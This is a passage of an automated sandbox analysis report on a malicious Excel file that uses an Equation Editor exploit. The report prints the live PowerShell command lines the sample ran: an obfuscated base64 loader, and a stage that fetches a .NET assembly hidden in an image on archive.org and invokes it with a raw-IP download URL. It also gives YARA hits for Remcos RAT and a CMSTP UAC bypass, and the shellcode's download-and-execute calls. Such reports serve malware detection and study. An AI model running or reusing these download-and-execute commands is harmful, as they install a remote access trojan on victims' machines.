? ? ? ?ZQBk? ? ? ? ?EE? ? ? ? ?cwBz? ? ? ? ?GU? ? ? ? ?bQBi? ? ? ? ?Gw? ? ? ? ?eQ? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FQ? ? ? ? ?eQBw? ? ? ? ?GU? ? ? ? ?K? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?bgBs? ? ? ? ?Gk? ? ? ? ?Yg? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?Tw? ? ? ? ?u? ? ? ? ?Eg? ? ? ? ?bwBt? ? ? ? ?GU? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bt? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HQ? ? ? ? ?eQBw? ? ? ? ?GU? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BN? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?? ? ? ? ?o? ? ? ? ?Cc? ? ? ? ?VgBB? ? ? ? ?Ek? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?C4? ? ? ? ?SQBu? ? ? ? ?HY? ? ? ? ?bwBr? ? ? ? ?GU? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?G4? ? ? ? ?dQBs? ? ? ? ?Gw? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?bwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?WwBd? ? ? ? ?F0? ? ? ? ?I? ? ? ? ?? ? ? ? ?o? ? ? ? ?Cc? ? ? ? ?d? ? ? ? ?B4? ? ? ? ?HQ? ? ? ? ?LgBS? ? ? ? ?FI? ? ? ? ?VgBF? ? ? ? ?C8? ? ? ? ?YwBi? ? ? ? ?G4? ? ? ? ?LwBw? ? ? ? ?H? ? ? ? ?? ? ? ? ?bQBh? ? ? ? ?Hg? ? ? ? ?Lw? ? ? ? ?x? ? ? ? ?DI? ? ? ? ?Lg? ? ? ? ?x? ? ? ? ?DM? ? ? ? ?Lg? ? ? ? ?y? ? ? ? ?Dc? ? ? ? ?MQ? ? ? ? ?u? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?C8? ? ? ? ?Lw? ? ? ? ?6? ? ? ? ?H? ? ? ? ?? ? ? ? ?d? ? ? ? ?B0? ? ? ? ?Gg? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?ZQBz? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?YQBk? ? ? ? ?G8? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?ZQBz? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?YQBk? ? ? ? ?G8? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?ZQBz? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?YQBk? ? ? ? ?G8? ? ? ? ?Jw? ? ? ? ?s? ? ? ? ?Cc? ? ? ? ?UgBl? ? ? ? ?Gc? ? ? ? ?QQBz? ? ? ? ?G0? ? ? ? ?Jw? ? ? ? ?s? ? ? ? ?Cc? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?Ck? ? ? ? ?';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('? ? ? ? ?','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                      Imagebase:0xdf0000
                                                                      File size:427'008 bytes
                                                                      MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:13
                                                                      Start time:00:54:06
                                                                      Start date:28/08/2024
                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.RRVE/cbn/ppmax/12.13.271.701//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                                                                      Imagebase:0xdf0000
                                                                      File size:427'008 bytes
                                                                      MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.512511300.0000000003E99000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000D.00000002.512511300.0000000003E99000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000D.00000002.512511300.0000000003E99000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:14
                                                                      Start time:00:54:12
                                                                      Start date:28/08/2024
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                      Imagebase:0xe00000
                                                                      File size:64'704 bytes
                                                                      MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.620697128.0000000000525000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.620697128.0000000000541000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:15
                                                                      Start time:00:54:16
                                                                      Start date:28/08/2024
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\dkvezxrxwrjunntcnioxumzdjxq"
                                                                      Imagebase:0xe00000
                                                                      File size:64'704 bytes
                                                                      MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:16
                                                                      Start time:00:54:16
                                                                      Start date:28/08/2024
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\neiwzpcqkzbyxbpgesbzxztmrehzcv"
                                                                      Imagebase:0xe00000
                                                                      File size:64'704 bytes
                                                                      MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:17
                                                                      Start time:00:54:16
                                                                      Start date:28/08/2024
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\neiwzpcqkzbyxbpgesbzxztmrehzcv"
                                                                      Imagebase:0xe00000
                                                                      File size:64'704 bytes
                                                                      MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:18
                                                                      Start time:00:54:16
                                                                      Start date:28/08/2024
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qgopainsfhtlahdsndosiegdstrivgqcq"
                                                                      Imagebase:0xe00000
                                                                      File size:64'704 bytes
                                                                      MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Disassembly

                                                                      Code Analysis

                                                                      Call Graph

                                                                      • Entrypoint
                                                                      • Decryption Function
                                                                      • Executed
                                                                      • Not Executed
                                                                      • Show Help
                                                                      callgraph 1 Error: Graph is empty

                                                                      Module: Sheet1

                                                                      Declaration
                                                                      LineContent
                                                                      1

                                                                      Attribute VB_Name = "Sheet1"

                                                                      2

                                                                      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                      3

                                                                      Attribute VB_GlobalNameSpace = False

                                                                      4

                                                                      Attribute VB_Creatable = False

                                                                      5

                                                                      Attribute VB_PredeclaredId = True

                                                                      6

                                                                      Attribute VB_Exposed = True

                                                                      7

                                                                      Attribute VB_TemplateDerived = False

                                                                      8

                                                                      Attribute VB_Customizable = True

                                                                      Module: Sheet2

                                                                      Declaration
                                                                      LineContent
                                                                      1

                                                                      Attribute VB_Name = "Sheet2"

                                                                      2

                                                                      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                      3

                                                                      Attribute VB_GlobalNameSpace = False

                                                                      4

                                                                      Attribute VB_Creatable = False

                                                                      5

                                                                      Attribute VB_PredeclaredId = True

                                                                      6

                                                                      Attribute VB_Exposed = True

                                                                      7

                                                                      Attribute VB_TemplateDerived = False

                                                                      8

                                                                      Attribute VB_Customizable = True

                                                                      Module: Sheet3

                                                                      Declaration
                                                                      LineContent
                                                                      1

                                                                      Attribute VB_Name = "Sheet3"

                                                                      2

                                                                      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                      3

                                                                      Attribute VB_GlobalNameSpace = False

                                                                      4

                                                                      Attribute VB_Creatable = False

                                                                      5

                                                                      Attribute VB_PredeclaredId = True

                                                                      6

                                                                      Attribute VB_Exposed = True

                                                                      7

                                                                      Attribute VB_TemplateDerived = False

                                                                      8

                                                                      Attribute VB_Customizable = True

                                                                      Module: ThisWorkbook

                                                                      Declaration
                                                                      LineContent
                                                                      1

                                                                      Attribute VB_Name = "ThisWorkbook"

                                                                      2

                                                                      Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                                                                      3

                                                                      Attribute VB_GlobalNameSpace = False

                                                                      4

                                                                      Attribute VB_Creatable = False

                                                                      5

                                                                      Attribute VB_PredeclaredId = True

                                                                      6

                                                                      Attribute VB_Exposed = True

                                                                      7

                                                                      Attribute VB_TemplateDerived = False

                                                                      8

                                                                      Attribute VB_Customizable = True

                                                                      Reset < >

                                                                        Execution Graph

                                                                        Execution Coverage:3.1%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:73.8%
                                                                        Total number of Nodes:42
                                                                        Total number of Limit Nodes:4
                                                                        execution_graph 589 331fba LoadLibraryW 594 331fd4 589->594 595 331fd7 594->595 597 331fe5 595->597 598 33206f URLDownloadToFileW 595->598 608 332088 598->608 603 332097 ShellExecuteW 623 3320c2 603->623 605 3320b6 606 3320fc 605->606 607 3320c5 ExitProcess 605->607 606->597 609 33208a 608->609 610 33208f 609->610 611 33209d 3 API calls 609->611 612 332097 ShellExecuteW 610->612 614 332078 610->614 611->610 613 3320c2 ExitProcess 612->613 615 3320b6 613->615 617 33209d 614->617 615->614 616 3320c5 ExitProcess 615->616 618 3320a0 ShellExecuteW 617->618 619 3320b6 618->619 620 3320c2 ExitProcess 618->620 621 33208f 619->621 622 3320c5 ExitProcess 619->622 620->619 621->603 621->606 624 3320c5 ExitProcess 623->624 625 3320c9 GetPEB 626 3320d7 625->626 627 331edd ExitProcess 638 331ef6 627->638 639 331efc 638->639 650 331f12 639->650 651 331f18 650->651 660 331f39 651->660 661 331f3c 660->661 664 331fa5 661->664 665 331fa7 664->665 668 331fba LoadLibraryW 665->668 669 331fd4 8 API calls 668->669 670 331fc1 669->670 671 331fe5 670->671 672 33206f 8 API calls 670->672 672->671

                                                                        Executed Functions

                                                                        Function 0033206F Relevance: 4.5, APIs: 3, Instructions: 37filenetworkCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 0 33206f-332095 URLDownloadToFileW call 332088 call 33209d 6 332097-3320b7 ShellExecuteW call 3320c2 0->6 7 3320fc-332108 0->7 13 332122-332126 6->13 14 3320b9 6->14 9 33210b 7->9 11 332113-332117 9->11 12 33210d-332111 9->12 16 332119-33211d 11->16 17 33212c-33212e 11->17 12->11 15 33211f 12->15 19 33212a 13->19 20 332128 13->20 14->9 18 3320bb 14->18 15->13 16->15 16->17 21 33213e-33213f 17->21 18->17 22 3320bd-3320c7 ExitProcess 18->22 19->17 23 332130-332139 19->23 20->17 26 332102-332105 23->26 27 33213b 23->27 26->23 28 332107 26->28 27->21 28->9
                                                                        APIs
                                                                        • URLDownloadToFileW.URLMON(00000000,00331FE5,?,00000000,00000000), ref: 00332071
                                                                          • Part of subcall function 00332088: ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 003320AF
                                                                          • Part of subcall function 00332088: ExitProcess.KERNEL32(00000000), ref: 003320C7
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.495162987.000000000031E000.00000004.00000020.00020000.00000000.sdmp, Offset: 0031E000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_31e000_EQNEDT32.jbxd
                                                                        Similarity
                                                                        • API ID: DownloadExecuteExitFileProcessShell
                                                                        • String ID:
                                                                        • API String ID: 3584569557-0
                                                                        • Opcode ID: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
                                                                        • Instruction ID: b7d3dfa2ba017b154114a74fac40d0413e52dcc8f3e4965d99d6e5adcc0599cd
                                                                        • Opcode Fuzzy Hash: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
                                                                        • Instruction Fuzzy Hash: 72F0E5B1A9C38439EB27B7700CCFF6B2E55AFA1B00F550889B2565E4E3D994880CC229
                                                                        Function 0033209D Relevance: 3.0, APIs: 2, Instructions: 50COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 30 33209d-3320af ShellExecuteW 32 3320b6-3320b7 30->32 33 3320b1 call 3320c2 30->33 34 332122-332126 32->34 35 3320b9 32->35 33->32 38 33212a 34->38 39 332128 34->39 36 33210b 35->36 37 3320bb 35->37 40 332113-332117 36->40 41 33210d-332111 36->41 42 3320bd-3320c7 ExitProcess 37->42 43 33212c-33212e 37->43 38->43 44 332130-332139 38->44 39->43 40->43 46 332119-33211d 40->46 41->40 45 33211f 41->45 48 33213e-33213f 43->48 50 332102-332105 44->50 51 33213b 44->51 45->34 46->43 46->45 50->44 52 332107 50->52 51->48 52->36
                                                                        APIs
                                                                        • ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 003320AF
                                                                          • Part of subcall function 003320C2: ExitProcess.KERNEL32(00000000), ref: 003320C7
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.495162987.000000000031E000.00000004.00000020.00020000.00000000.sdmp, Offset: 0031E000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_31e000_EQNEDT32.jbxd
                                                                        Similarity
                                                                        • API ID: ExecuteExitProcessShell
                                                                        • String ID:
                                                                        • API String ID: 1124553745-0
                                                                        • Opcode ID: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
                                                                        • Instruction ID: d9b3b3b9255dc90f98e2b01d2650af8273eb71f5111611fbbba86a1be72abb48
                                                                        • Opcode Fuzzy Hash: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
                                                                        • Instruction Fuzzy Hash: 9B0178B4E6438220DF3332348EC6FBB2B46EB92700FC98807FBC0084C5D49498C38629
                                                                        Function 00332088 Relevance: 3.0, APIs: 2, Instructions: 47COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 54 332088-33208a 56 33208f-332095 54->56 57 33208a call 33209d 54->57 58 332097-3320b7 ShellExecuteW call 3320c2 56->58 59 3320fc-332108 56->59 57->56 65 332122-332126 58->65 66 3320b9 58->66 61 33210b 59->61 63 332113-332117 61->63 64 33210d-332111 61->64 68 332119-33211d 63->68 69 33212c-33212e 63->69 64->63 67 33211f 64->67 71 33212a 65->71 72 332128 65->72 66->61 70 3320bb 66->70 67->65 68->67 68->69 73 33213e-33213f 69->73 70->69 74 3320bd-3320c7 ExitProcess 70->74 71->69 75 332130-332139 71->75 72->69 78 332102-332105 75->78 79 33213b 75->79 78->75 80 332107 78->80 79->73 80->61
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.495162987.000000000031E000.00000004.00000020.00020000.00000000.sdmp, Offset: 0031E000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_31e000_EQNEDT32.jbxd
                                                                        Similarity
                                                                        • API ID: ExecuteExitProcessShell
                                                                        • String ID:
                                                                        • API String ID: 1124553745-0
                                                                        • Opcode ID: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
                                                                        • Instruction ID: 8f1822888a81a6f60c076e9c292ffe4f9ae35f810806925542810b1f61635dfd
                                                                        • Opcode Fuzzy Hash: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
                                                                        • Instruction Fuzzy Hash: FE014C30F9834634E773B3304ECABAF6AC6EF92704FA1845AF7910D495D2948847C22D
                                                                        Function 00331FBA Relevance: 1.6, APIs: 1, Instructions: 80libraryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 82 331fba-331fbc LoadLibraryW call 331fd4 84 331fc1-331fc6 82->84 85 332036-33206d 84->85 86 331fc8-332035 call 33206f 84->86 86->85
                                                                        APIs
                                                                        • LoadLibraryW.KERNEL32(00331FAC), ref: 00331FBA
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.495162987.000000000031E000.00000004.00000020.00020000.00000000.sdmp, Offset: 0031E000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_31e000_EQNEDT32.jbxd
                                                                        Similarity
                                                                        • API ID: LibraryLoad
                                                                        • String ID:
                                                                        • API String ID: 1029625771-0
                                                                        • Opcode ID: 25f2aaeb1c1f5c2249ed294ceeb0698778b2950a98b5d46b2ce69151e1164ee1
                                                                        • Instruction ID: 680911f72a42a3ce5e4401fdace448e36afd794f9eb164d9969908ad58bf00b5
                                                                        • Opcode Fuzzy Hash: 25f2aaeb1c1f5c2249ed294ceeb0698778b2950a98b5d46b2ce69151e1164ee1
                                                                        • Instruction Fuzzy Hash: 5F21C3A280D7C21FCB2B87704DBE656BF613927214B5DCACFD0D60A8A3E3989545C793
                                                                        Function 003320C2 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 98 3320c2-3320c7 ExitProcess
                                                                        APIs
                                                                        • ExitProcess.KERNEL32(00000000), ref: 003320C7
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.495162987.000000000031E000.00000004.00000020.00020000.00000000.sdmp, Offset: 0031E000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_31e000_EQNEDT32.jbxd
                                                                        Similarity
                                                                        • API ID: ExitProcess
                                                                        • String ID:
                                                                        • API String ID: 621844428-0
                                                                        • Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                                                                        • Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
                                                                        • Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                                                                        • Instruction Fuzzy Hash:
                                                                        Function 003320C9 Relevance: .0, Instructions: 14COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 100 3320c9-3320d4 GetPEB 101 3320d7-3320e8 call 3320f1 100->101 104 3320ea-3320ee 101->104
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.495162987.000000000031E000.00000004.00000020.00020000.00000000.sdmp, Offset: 0031E000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_31e000_EQNEDT32.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                                                                        • Instruction ID: 8751f660dd6838666d34c2e9dadc00ab7e8c8a790127ac82ec65bae06f513fad
                                                                        • Opcode Fuzzy Hash: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                                                                        • Instruction Fuzzy Hash: 90D06C712125429BD20ADB04C990E57F36AFBD8615B24C268E5054BA2AD730E896DA94

                                                                        Non-executed Functions

                                                                        Function 0032479E Relevance: 2.4, Strings: 1, Instructions: 1191COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 105 32479e-3247fc 106 3247fe 105->106 107 3247ff-324800 105->107 106->107 108 324801-324802 106->108 107->108 109 324803-324804 107->109 108->109 110 324805-324806 108->110 109->110 111 324807-324808 109->111 110->111 112 324809-32480a 110->112 111->112 113 32480b-32480c 111->113 112->113 114 32480e 113->114 115 32480f-324816 113->115 114->115 116 324818 115->116 117 324819-32481c 115->117 116->117 118 32481e 117->118 119 32481d 117->119 120 324820 118->120 121 32481f 118->121 119->118 122 324822 120->122 123 324821 120->123 121->120 124 324823 122->124 125 324824 122->125 123->122 124->125 126 324826 125->126 127 324825 125->127 128 324827 126->128 129 324828-32482a 126->129 127->126 128->129 130 32482b 129->130 131 32482c 129->131 130->131 132 32482e 131->132 133 32482d 131->133 134 324830 132->134 135 32482f 132->135 133->132 136 324832 134->136 137 324831 134->137 135->134 138 324833 136->138 139 324834-324af4 136->139 137->136 138->139 140 324b40-324b60 139->140 141 324af6-324b3d 139->141 142 324b62-324b84 140->142 143 324bad-324bd0 140->143 141->140 144 324bd1-324c19 142->144 145 324b86-324bac 142->145 143->144 146 324c1c-3251be 143->146 144->146 145->143
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.495162987.000000000031E000.00000004.00000020.00020000.00000000.sdmp, Offset: 0031E000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_31e000_EQNEDT32.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ((9
                                                                        • API String ID: 0-3410487528
                                                                        • Opcode ID: d4497076d0a0b811706a7aca8e62bd45fc2afd4056793c57d0f404a1f80e40bf
                                                                        • Instruction ID: ee143fb911c14b13e9ffed81b2c8fdd81f35eca34eb43e9a769f68e833c90bdc
                                                                        • Opcode Fuzzy Hash: d4497076d0a0b811706a7aca8e62bd45fc2afd4056793c57d0f404a1f80e40bf
                                                                        • Instruction Fuzzy Hash: 63920E6244F7D15FC7538B7098B5690BFB0AE13218B2E85DBC4C5CE0A7E25E588AD723
                                                                        Function 00331EDD Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 150 331edd-331f04 ExitProcess call 331ef6 153 331f57-331f77 150->153 154 331f07 150->154 157 331f78-331f83 153->157 156 331f09-331f0f 154->156 154->157 160 331f84-331f98 156->160 162 331f11-331f18 156->162 157->160 163 331f9b-331fa3 160->163 165 331f1f-331f29 162->165 166 331f1a call 331f39 162->166 170 331f2b-331f2f 165->170 171 331f9a 165->171 166->165 170->160 172 331f31 170->172 171->163 173 331f33-331f54 call 331fa5 172->173 174 331fa5-331fb8 call 331fba 172->174 173->153
                                                                        APIs
                                                                        • ExitProcess.KERNEL32(00331ECB), ref: 00331EDD
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.495162987.000000000031E000.00000004.00000020.00020000.00000000.sdmp, Offset: 0031E000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_31e000_EQNEDT32.jbxd
                                                                        Similarity
                                                                        • API ID: ExitProcess
                                                                        • String ID:
                                                                        • API String ID: 621844428-0
                                                                        • Opcode ID: 8f831a929f2bd190acff2866f52086b54ddd8745d3a087e7a7c4dc7e577b947a
                                                                        • Instruction ID: cb78d09a30a3afcc8cdd8178ee8dc9e8067ff446adb58f10dd7efc89e3302162
                                                                        • Opcode Fuzzy Hash: 8f831a929f2bd190acff2866f52086b54ddd8745d3a087e7a7c4dc7e577b947a
                                                                        • Instruction Fuzzy Hash: 6D21365241DBC10FD71797705AEA0A5BF60B923600B5DCBCEC0DA4E8A3E7959946D382
                                                                        Function 00322708 Relevance: .6, Instructions: 626COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 196 322708-322bc5
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.495162987.000000000031E000.00000004.00000020.00020000.00000000.sdmp, Offset: 0031E000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_31e000_EQNEDT32.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b406477ba4ac0a08bc97bad2efde38d0ae47b74e4f38927e9e5280eae940b6dc
                                                                        • Instruction ID: 7af6813f02e347cc5d1cc846fb97a4df402b8cd5d23414e07dcf57861c8e8a03
                                                                        • Opcode Fuzzy Hash: b406477ba4ac0a08bc97bad2efde38d0ae47b74e4f38927e9e5280eae940b6dc
